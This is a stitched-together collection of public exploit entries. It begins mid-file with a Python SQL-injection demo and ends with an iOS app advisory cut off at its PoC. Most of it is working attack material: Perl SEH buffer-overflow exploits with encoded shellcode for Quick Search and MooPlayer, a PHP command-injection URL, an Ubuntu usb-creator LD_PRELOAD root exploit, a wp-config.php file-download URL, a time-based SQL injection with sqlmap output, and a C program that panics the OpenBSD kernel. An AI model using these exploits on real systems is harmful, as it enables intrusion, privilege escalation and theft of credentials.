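    if not is_valid_item_id(item_id):
        raise ValueError("Item_ID must be a non-negative integer")
    key = int(item_id)
    conn.execute("UPDATE items SET Item_Views = Item_Views + 1 WHERE Item_ID=?", (key,))
    row = conn.execute("SELECT Item_Views FROM items WHERE Item_ID=?", (key,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    true_case, false_case = "2' and 'a'='a", "2' and 'a'='b"
    print("vulnerable:", single_product_vulnerable(db, true_case), single_product_vulnerable(db, false_case))
    print("fixed:     ", single_product_fixed(db, true_case), single_product_fixed(db, false_case))
    print("fixed, honest input:", single_product_fixed(db, "2"))
    print("record_view Item_ID=2 ->", record_view_fixed(db, "2"), "views")
```

The vulnerable function answers the two probe strings differently (one row versus none), which is exactly the boolean oracle the second advisory's PoC relies on; the bound-parameter version answers both with an empty result and still finds the product for the honest input `2`.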
            
#!/usr/bin/perl

##################################################################################################
# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
# Date: 2015-04-23
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: Quick Search v1.1.0.189
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 93445
##################################################################################################
# Credits:
# - Vulnerability identified by ariarat
#   http://www.exploit-db.com/exploits/25443/
##################################################################################################
# Exploit development notes:
# - instead of attaching the process, start the executable within the debugger
#   - the application's module gtms_D7.bpl was not compiled with SafeSEH
#     - since this is a unicode buffer overflow \x00 will not terminate the string
#       - 6 available unicode friendly P/P/R pointers within the module
#         - this exploit should work across different OS versions
#           (tested only on Win XP SP2 EN)
#   - several other unicode friendly application modules are available, but have not been checked
##################################################################################################
# How to exploit:
# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->
#   (paste created exploit string into the search textbox)
#   - once the exploit string is pasted, the egghunter starts to search the memory for the marker
#     - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
#       - during the search the mouse cursor will NOT have an hourglass displayed beside it
#       - during the search the application will NOT become unresponsive (i.e. it will be usable)
##################################################################################################
# Thanks to:
# - ariarat (PoC)
# - Peter Van Eeckhoutte (exploit development tutorials)
# - Offensive Security (IT security courses, admin support)
##################################################################################################

my $junk = "A" x 21;

# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";

my $fill = "C" x (1045 - length($junk.$egghunter));
my $nextSEH = "\x41\x6d";                       # INC ECX; INSW Yz DX
my $SEH = "\x70\x34";                           # POP POP RET from gtms_D7.bpl

# jump to egghunter code
my $allign = "\x58";                            # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x05\x01\x11";               # ADD EAX, 0x11000100
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x2d\x09\x11";               # SUB EAX, 0x11000900
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
my $jumptoegghunter = "\x50";                   # PUSH EAX
$jumptoegghunter = $jumptoegghunter."\x6d";     # NOP/remove NULL bytes
$jumptoegghunter = $jumptoegghunter."\xc3";     # RETN

# fill the rest of the stack frame + padding (to avoid a memory area which converts to upper alpha)
my $fill2 = "D" x 500;

# allign EAX and jump to shellcode
# (this gets executed after the marker is found)
my $allign2 = "\x6d";                           # NOP/remove NULL bytes
$allign2 = $allign2."\x57";                     # PUSH EDI
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x58";                     # POP EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\xb9\x1b\xaa";             # MOV ECX, 0xaa001b00
$allign2 = $allign2."\xe8";                     # ADD AL,CH (equivalent to adding "1b" (from the previous command)
                                                # to the last two bytes of EAX; i.e. increase EAX with "1b")
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x50";                     # PUSH EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\xc3";                     # RETN

# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
"PPP0KPOBB3E0FQXOQOQAA";

my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;

open(myfile,'>QuickSearch_egghunter_messagebox.txt');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytes\n";
            
#[+] Author: TUNISIAN CYBER
#[+] Title:  WebUI Remote Code Execution Vulnerability
#[+] Date: 21-04-2015
#[+] Vendor: https://github.com/baram01/webui/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
-------------------------------------------------------------------------------
p0c:

http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'

Live HTTP Header:
http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27

GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 22 Apr 2015 13:20:23 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 51
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
            
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu    (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty  (14.04LTS) <= usb-creator 0.2.56.3ubuntu     (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic  (14.10) <= usb-creator 0.2.62ubuntu0.2         (Patched in: 0.2.62ubuntu0.3)

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
            
#!/usr/bin/perl

############################################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
############################################################################################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
############################################################################################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, so its own addresses are available and could be used,
# which would make the exploit work across multiple OS versions; but those addresses always contain
# \x00 (a bad character), so the shellcode space would be limited since \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
############################################################################################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
############################################################################################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
# file) -> Open
# OR drag and drop created exploit file into MooPlayer
############################################################################################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
############################################################################################################


$file = "MooPlayer_messagebox.m3u";

my $junk = "A" x 264;
my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes
my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)
my $NOPs = "\x90" x 100;

# msfpayload windows/messagebox
# msfencode -e x86/alpha_upper
my $shellcode =
"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
"\x4f\x50\x55\x45\x58\x41\x41";

# keep the exploit length consistent
my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));

open(myfile,">$file");
print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;
close(myfile);
            
######################

# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download

# Exploit Author : Dadou Dz

# Software Link : Premium

# Dork Google: inurl:com_miwoftp

# Affected version: 1.0.5

# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog


# Date : 2015-04-20

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes



#####################

Discovered By : Dadou Dz
           My Email - dadoudzdz@gmail.com
           fb: fb.com/Dz2Team
         [ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi

Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team

 AnonGhost Team -  Anonymous Dz - Backup Sec Dz

 Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com

 And All My Freinds - All Muslims Hackers - All Algerian Hackers

#####################
            
######################

# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                  

# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip

# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder

# Date : 2015-03-29

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# Info:

 The "submit_nex_form" ajax function is affected by an SQL injection vulnerability:
 
 the "nex_forms_Id" variable is not sanitized

# PoC Exploit:

 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

# Poc Video:

 http://youtu.be/04G08Cbrx1I

# PoC sqlmap:

 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

######################

# Vulnerability Disclosure Timeline:

2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
/*

# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386

 * - 0xb16b00b5.c
 *
 * - Alejandro Hernandez (@nitr0usmx)
 * - Mexico 2015
 *
 * #########################################################################
 * #         OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c          #
 * #########################################################################
 *
 * Tested under:
 * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
 * - OpenBSD 5.6 i386
 * - OpenBSD 5.5 i386
 *
 * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
 *
 */

#include <stdio.h>
#include <stdlib.h>   /* system(), arc4random() */
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef  __OpenBSD__
	#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
	#error "Not i386 !!!1111";
#endif

char big_b00bz[] =
"       8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
"      88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
"     8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
"    88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
"   88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
"   8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
"     88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
"    888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
"    888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
"    88888  M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
"    8888   MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
"     888    M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
"     888    MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
"      88     M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
"       88    MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
"        88    MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
"         88   8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
"          8   88MM::::::::::::::::::::::M:::M::::::::MM\n"
"              888MM::::::::::::::::::MM::::::MM::::::M";

int main(int argc, char **argv)
{
	Elf32_Ehdr *hdr;
	Elf32_Phdr *pht; 
	struct stat statinfo;
	char *elfptr;
	int fd;

	if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
	fd = open(argv[1], O_RDWR);
	fstat(fd, &statinfo);
	elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	hdr = (Elf32_Ehdr *) (elfptr);
	pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
	printf("%s", big_b00bz);
	pht[9].p_type   = 0x7defaced; // <--- these overwrites ------------v
	pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
	sleep(3 + (arc4random() % 3));
	if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
	else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
	else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
	msync(elfptr, 0, MS_ASYNC);
	munmap(elfptr, statinfo.st_size);
	close(fd);
	sleep(3 + (arc4random() % 3));
	system(argv[1]); // ( o )( o )   panic()
	puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
	return 0xDEFECA7E;
}
            
Document Title:
===============
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1444


Release Date:
=============
2015-03-10


Vulnerability Laboratory ID (VL-ID):
====================================
1444


Common Vulnerability Scoring System:
====================================
8.6


Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? 
Photo Manager Pro is exactly what you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer 
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer 
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-03-10:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
The vulnerability allows remote attackers to execute malicious code on the application side of the vulnerable app to compromise the 
target mobile device.

The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the 
`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected 
device components. The attacker tampers with the new Folder POST method request to exchange the regular folderName value with specially crafted code. 
The input context becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application side. 

The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the arbitrary code execution vulnerability requires no user interaction or a privileged web-application user account with password.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent 
manipulation of function or connected module context.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] newfolder.action

Vulnerable Parameter(s):
				[+] folderName

Affected Module(s):
				[+] Index (http://localhost:8080)
				[+] Sub Category Path


Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Create Folder

<div id="main"><div id="breadcrumb">Home</div>
